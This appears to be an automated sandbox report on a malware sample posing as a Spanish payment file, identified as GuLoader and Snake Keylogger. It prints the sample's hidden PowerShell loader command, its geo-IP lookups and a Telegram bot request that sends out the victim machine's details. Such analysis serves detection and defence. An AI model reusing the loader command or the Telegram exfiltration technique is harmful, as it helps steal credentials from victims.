                                                                            2024-10-21 09:04:15 UTC896INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:15 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27120
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSYdp750QUmpMED2Z4oY%2FjJyqDuV3EyIOs1r%2FIw84q9d7HknrG%2FEThtds0eUVcv8nLE0hcyzgFgAk1hZ6invN8AsbK0xesx8%2B0JM9DEEHzl06aVoME17MjQgT1MwFcGePcD4Qhar"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60143f4f64468f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1587719&cwnd=244&unsent_bytes=0&cid=6ea54c3f5ccdf6a7&ts=148&x=0"
                                                                            2024-10-21 09:04:15 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.462520188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:16 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:16 UTC898INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:16 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27121
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUu224%2BtA8z0hmCpwxZPw8RcVLS%2FJjQBKwRy5Xl3havxiOx20xCkR6xK8kn0qFKm8K9eurM7ipm7TFPjNrJlF%2BtUhB2yOIePjSEoR6AMbpt46MOBt6%2Fuai33j7zRdI8cfLga%2Fjg7"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60144838026b83-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2458404&cwnd=242&unsent_bytes=0&cid=d3b3da738e2bc6e7&ts=159&x=0"
                                                                            2024-10-21 09:04:16 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.462522188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:18 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:18 UTC890INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:18 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27123
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmz1uYSET47gpqgSv4ZKRjbBv0muzOOhFUYnQHRoTNE6SYjnOxcqIzCnsBkRDKvaKa0nkaowqmK6R0WfUVmSwzDn2lGKvgYy1zal9kcIKEwJ2IkpPc40%2F1XkyT8aFM5k3Cco1AZI"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d6014514a286b46-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1793188&cwnd=246&unsent_bytes=0&cid=eef24e7d9a310363&ts=150&x=0"
                                                                            2024-10-21 09:04:18 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.462524188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:19 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:19 UTC890INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:19 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27124
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfVnMBknqIqhQtKMLKYiRlbwk8y1i7dYXfePLUHG9NuvRzroRIMrR6ng9OWrQTLwtYm9oCFcm4GTcalpQLdEU51qyOHciOC33Oz34uUILFiqhpq%2BXsOgYqNqltIzUXBActPCbojp"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d60145b3ffae946-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2500863&cwnd=250&unsent_bytes=0&cid=833788a2f68751c7&ts=333&x=0"
                                                                            2024-10-21 09:04:19 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.462526188.114.97.34437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:21 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:21 UTC904INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:21 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 27126
                                                                            Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2vhs74R9ot5Dtljg7qr0eB2%2F%2FATLQU3NuTvrrhOuIfn7qKI59uHpNs6LCXXp%2BWjj%2FYBwIb%2F2KBGMd%2BuM3jWn7zeqEv09EGkwGZPdamjeHyjhB6%2FHRj%2BqNrANnvMUiJmo4rIcXsP"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d6014669edb479f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2354471&cwnd=251&unsent_bytes=0&cid=b040fa4a26420e89&ts=148&x=0"
                                                                            2024-10-21 09:04:21 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                            Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                            2024-10-21 09:04:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.462527149.154.167.2204437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:22 UTC344INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Mon, 21 Oct 2024 09:04:22 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-10-21 09:04:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:05:03:36
                                                                            Start date:21/10/2024
                                                                            Path:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"
                                                                            Imagebase:0x400000
                                                                            File size:895'897 bytes
                                                                            MD5 hash:400AE56B0E2F429C20F563959042B2E9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:05:03:37
                                                                            Start date:21/10/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
                                                                            Imagebase:0xa10000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:05:03:37
                                                                            Start date:21/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:05:03:55
                                                                            Start date:21/10/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                            Imagebase:0x9c0000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:24.5%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:23%
                                                                              Total number of Nodes:1250
                                                                              Total number of Limit Nodes:42
                                                                              execution_graph 2698 403a41 2699 403b94 2698->2699 2700 403a59 2698->2700 2702 403be5 2699->2702 2703 403ba5 GetDlgItem GetDlgItem 2699->2703 2700->2699 2701 403a65 2700->2701 2704 403a70 SetWindowPos 2701->2704 2705 403a83 2701->2705 2707 403c3f 2702->2707 2715 401389 2 API calls 2702->2715 2706 403f14 19 API calls 2703->2706 2704->2705 2709 403aa0 2705->2709 2710 403a88 ShowWindow 2705->2710 2711 403bcf SetClassLongA 2706->2711 2716 403b8f 2707->2716 2768 403f60 2707->2768 2712 403ac2 2709->2712 2713 403aa8 DestroyWindow 2709->2713 2710->2709 2714 40140b 2 API calls 2711->2714 2718 403ac7 SetWindowLongA 2712->2718 2719 403ad8 2712->2719 2717 403e9d 2713->2717 2714->2702 2720 403c17 2715->2720 2717->2716 2727 403ece ShowWindow 2717->2727 2718->2716 2723 403b81 2719->2723 2724 403ae4 GetDlgItem 2719->2724 2720->2707 2725 403c1b SendMessageA 2720->2725 2721 40140b 2 API calls 2739 403c51 2721->2739 2722 403e9f DestroyWindow EndDialog 2722->2717 2805 403f7b 2723->2805 2728 403b14 2724->2728 2729 403af7 SendMessageA IsWindowEnabled 2724->2729 2725->2716 2727->2716 2731 403b21 2728->2731 2732 403b68 SendMessageA 2728->2732 2733 403b34 2728->2733 2742 403b19 2728->2742 2729->2716 2729->2728 2731->2732 2731->2742 2732->2723 2736 403b51 2733->2736 2737 403b3c 2733->2737 2735 403f14 19 API calls 2735->2739 2741 40140b 2 API calls 2736->2741 2799 40140b 2737->2799 2738 403b4f 2738->2723 2739->2716 2739->2721 2739->2722 2739->2735 2759 403ddf DestroyWindow 2739->2759 2771 405d51 2739->2771 2789 403f14 2739->2789 2743 403b58 2741->2743 2802 403eed 2742->2802 2743->2723 2743->2742 2745 403ccc GetDlgItem 2746 403ce1 2745->2746 2747 403ce9 ShowWindow KiUserCallbackDispatcher 2745->2747 2746->2747 2792 403f36 EnableWindow 2747->2792 2749 403d13 EnableWindow 2752 403d27 2749->2752 2750 403d2c GetSystemMenu EnableMenuItem SendMessageA 2751 403d5c SendMessageA 2750->2751 2750->2752 2751->2752 2752->2750 2793 403f49 SendMessageA 2752->2793 2794 405d2f lstrcpynA 2752->2794 2755 403d8a lstrlenA 2756 405d51 18 API calls 2755->2756 2757 403d9b SetWindowTextA 2756->2757 2795 401389 2757->2795 2759->2717 2760 403df9 CreateDialogParamA 2759->2760 2760->2717 2761 403e2c 2760->2761 2762 403f14 19 API calls 2761->2762 2763 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2762->2763 2764 401389 2 API calls 2763->2764 2765 403e7d 2764->2765 2765->2716 2766 403e85 ShowWindow 2765->2766 2767 403f60 SendMessageA 2766->2767 2767->2717 2769 403f78 2768->2769 2770 403f69 SendMessageA 2768->2770 2769->2739 2770->2769 2776 405d5e 2771->2776 2772 405f81 2773 405f96 2772->2773 2835 405d2f lstrcpynA 2772->2835 2773->2739 2775 405dff GetVersion 2775->2776 2776->2772 2776->2775 2777 405f58 lstrlenA 2776->2777 2780 405d51 10 API calls 2776->2780 2782 405e77 GetSystemDirectoryA 2776->2782 2783 405e8a GetWindowsDirectoryA 2776->2783 2785 405ebe SHGetSpecialFolderLocation 2776->2785 2786 405d51 10 API calls 2776->2786 2787 405f01 lstrcatA 2776->2787 2819 405c16 RegOpenKeyExA 2776->2819 2824 405f9a 2776->2824 2833 405c8d wsprintfA 2776->2833 2834 405d2f lstrcpynA 2776->2834 2777->2776 2780->2777 2782->2776 2783->2776 2785->2776 2788 405ed6 SHGetPathFromIDListA CoTaskMemFree 2785->2788 2786->2776 2787->2776 2788->2776 2790 405d51 18 API calls 2789->2790 2791 403f1f SetDlgItemTextA 2790->2791 2791->2745 2792->2749 2793->2752 2794->2755 2796 401390 2795->2796 2797 4013fe 2796->2797 2798 4013cb MulDiv SendMessageA 2796->2798 2797->2739 2798->2796 2800 401389 2 API calls 2799->2800 2801 401420 2800->2801 2801->2742 2803 403ef4 2802->2803 2804 403efa SendMessageA 2802->2804 2803->2804 2804->2738 2806 403f93 GetWindowLongA 2805->2806 2816 40401c 2805->2816 2807 403fa4 2806->2807 2806->2816 2808 403fb3 GetSysColor 2807->2808 2809 403fb6 2807->2809 2808->2809 2810 403fc6 SetBkMode 2809->2810 2811 403fbc SetTextColor 2809->2811 2812 403fe4 2810->2812 2813 403fde GetSysColor 2810->2813 2811->2810 2814 403feb SetBkColor 2812->2814 2815 403ff5 2812->2815 2813->2812 2814->2815 2815->2816 2817 404008 DeleteObject 2815->2817 2818 40400f CreateBrushIndirect 2815->2818 2816->2716 2817->2818 2818->2816 2820 405c87 2819->2820 2821 405c49 RegQueryValueExA 2819->2821 2820->2776 2822 405c6a RegCloseKey 2821->2822 2822->2820 2831 405fa6 2824->2831 2825 40600e 2826 406012 CharPrevA 2825->2826 2829 40602d 2825->2829 2826->2825 2827 406003 CharNextA 2827->2825 2827->2831 2829->2776 2830 405ff1 CharNextA 2830->2831 2831->2825 2831->2827 2831->2830 2832 405ffe CharNextA 2831->2832 2836 4057cc 2831->2836 2832->2827 2833->2776 2834->2776 2835->2773 2837 4057d2 2836->2837 2838 4057e5 2837->2838 2839 4057d8 CharNextA 2837->2839 2838->2831 2839->2837 3577 401cc2 3578 402a1d 18 API calls 3577->3578 3579 401cd2 SetWindowLongA 3578->3579 3580 4028cf 3579->3580 3581 401a43 3582 402a1d 18 API calls 3581->3582 3583 401a49 3582->3583 3584 402a1d 18 API calls 3583->3584 3585 4019f3 3584->3585 2852 401e44 2853 402a3a 18 API calls 2852->2853 2854 401e4a 2853->2854 2868 404f48 2854->2868 2858 401eb0 CloseHandle 2860 4026a6 2858->2860 2859 401e5a 2859->2858 2859->2860 2861 401e79 WaitForSingleObject 2859->2861 2882 406104 2859->2882 2861->2859 2862 401e87 GetExitCodeProcess 2861->2862 2863 401ea4 2862->2863 2864 401e99 2862->2864 2863->2858 2867 401ea2 2863->2867 2886 405c8d wsprintfA 2864->2886 2867->2858 2869 401e54 2868->2869 2870 404f63 2868->2870 2879 4054c0 CreateProcessA 2869->2879 2871 404f80 lstrlenA 2870->2871 2872 405d51 18 API calls 2870->2872 2873 404fa9 2871->2873 2874 404f8e lstrlenA 2871->2874 2872->2871 2876 404fbc 2873->2876 2877 404faf SetWindowTextA 2873->2877 2874->2869 2875 404fa0 lstrcatA 2874->2875 2875->2873 2876->2869 2878 404fc2 SendMessageA SendMessageA SendMessageA 2876->2878 2877->2876 2878->2869 2880 4054f3 CloseHandle 2879->2880 2881 4054ff 2879->2881 2880->2881 2881->2859 2883 406121 PeekMessageA 2882->2883 2884 406131 2883->2884 2885 406117 DispatchMessageA 2883->2885 2884->2861 2885->2883 2886->2867 3586 402644 3587 40264a 3586->3587 3588 402652 FindClose 3587->3588 3589 4028cf 3587->3589 3588->3589 2935 4048c5 GetDlgItem GetDlgItem 2936 404917 7 API calls 2935->2936 2949 404b2f 2935->2949 2937 4049ba DeleteObject 2936->2937 2938 4049ad SendMessageA 2936->2938 2939 4049c3 2937->2939 2938->2937 2941 4049fa 2939->2941 2942 405d51 18 API calls 2939->2942 2940 404c13 2945 404cbf 2940->2945 2952 404ea7 2940->2952 2957 404c6c SendMessageA 2940->2957 2944 403f14 19 API calls 2941->2944 2946 4049dc SendMessageA SendMessageA 2942->2946 2943 404bf4 2943->2940 2954 404c05 SendMessageA 2943->2954 2951 404a0e 2944->2951 2947 404cd1 2945->2947 2948 404cc9 SendMessageA 2945->2948 2946->2939 2959 404ce3 ImageList_Destroy 2947->2959 2960 404cea 2947->2960 2968 404cfa 2947->2968 2948->2947 2949->2940 2949->2943 2950 404b8f 2949->2950 2991 404813 SendMessageA 2950->2991 2956 403f14 19 API calls 2951->2956 2953 403f7b 8 API calls 2952->2953 2958 404eb5 2953->2958 2954->2940 2972 404a1c 2956->2972 2957->2952 2962 404c81 SendMessageA 2957->2962 2959->2960 2963 404cf3 GlobalFree 2960->2963 2960->2968 2961 404e69 2961->2952 2966 404e7b ShowWindow GetDlgItem ShowWindow 2961->2966 2965 404c94 2962->2965 2963->2968 2964 404af0 GetWindowLongA SetWindowLongA 2967 404b09 2964->2967 2973 404ca5 SendMessageA 2965->2973 2966->2952 2969 404b27 2967->2969 2970 404b0f ShowWindow 2967->2970 2968->2961 2983 404d35 2968->2983 2996 404893 2968->2996 2990 403f49 SendMessageA 2969->2990 2989 403f49 SendMessageA 2970->2989 2971 404ba0 2971->2943 